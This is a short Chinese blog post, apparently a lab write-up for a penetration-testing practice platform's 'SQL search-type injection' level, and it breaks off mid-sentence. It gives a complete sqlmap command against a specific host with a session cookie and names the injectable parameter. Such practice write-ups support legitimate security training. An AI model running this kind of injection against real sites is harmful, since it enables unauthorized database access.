安銮渗透实战平台-SQL搜索型注入02

花生什么树Zz

于 2023-11-09 15:20:38 发布

阅读量123

点赞数 1

分类专栏：安銮渗透测试实战平台文章标签：网络安全

本文链接：https://blog.youkuaiyun.com/biubiubiuXXD/article/details/134311525

版权

安銮渗透实战平台（SQL搜索型注入02）

在这里插入图片描述发现请求头中有Cookie,且payload中的action字段是静态的（注：使用sqlmap的同学要注意这一点，有cookie记得需要将cookie加入到命令中去，否则会注入失败）

sqlmap -u "http://106.15.50.112:8125/sqli_1.php?title=1&action=search" -p "title" --cookie="security_level=0; PHPSESSID=9jr1e4grvmehurpprao4ke4hv1"

注（-p指定注入参数，由于我们知道action字段是定值所以将title字段指定为注入点，